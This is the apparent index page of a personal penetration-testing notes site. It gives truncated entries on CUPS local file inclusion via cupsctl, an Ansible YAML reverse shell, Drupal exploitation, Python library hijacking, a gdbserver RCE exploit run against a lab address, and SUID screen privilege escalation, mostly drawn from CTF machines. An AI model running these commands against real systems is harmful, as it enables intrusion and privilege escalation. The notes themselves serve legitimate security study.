Shuciran Pentesting Notes

Cupsctl LFI

LFI An LFI is present if you have access to the system, you need to change the ErrorLog path for the file that you want to read: cupsctl ErrorLog="/root/root.txt" Then from the web server we need ...

Ansible RCE via YAML file

YML RCE Example to obtain a reverse shell using test.yml file: --- - name: Display known facts for host hosts: 127.0.0.1 sudo: true sudo_user: root connection: local gather_facts: false ...

Drupal Exploitation

Drupal exploitation/enumeration Github: drupwn In order to make this exploit working first run the python setup.py script: python setup.py install Then run the enumeration/exploitation binary ...

Python Library Hijacking

Libraries hijacking If there is a script using certain library without full path, you can hijack and impersonate commands as the user executing the script: alice@wonderland:/root$ sudo -l User ali...

Services Running

For Windows and Linux the following command shows TCP services running: netstat -ano -p tcp Also for linux you can use the following command: ss -tulnp Examples: [[StreamIO#^1d2840]] [[Antique#...

Backdoor (Medium)

Content WordPress Local File Inclusion Vulnerability (LFI) LFI to RCE (Abusing /proc/PID/cmdline) Gdbserver RCE Vulnerability Abusing Screen (Privilege Escalation) [Session synchronizatio...

GDBServer 9.2 RCE

If the gdbserver is 9.2 or prior it is vulnerable to a RCE exploitation: Exploit: gdbserver sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin Examples: Backdoor

SUID Screen Exploitation

Screen If screen is running as SUID you can look for a dettached session and use it to escalate privileges, first run the following command: ps -aux | grep screen If there is indeed a screen comma...

Azure Devops Enumeration

Azure DevOps Server is a Microsoft product that provides version control, reporting, requirements management, project management (for both agile software development and waterfall teams), automated...

SCP

SCP To download files: scp <Username>@<IPorHost>:<PathToFile> <LocalFileLocation> Upload files: scp file.txt remote_username@10.10.0.2:/remote/directory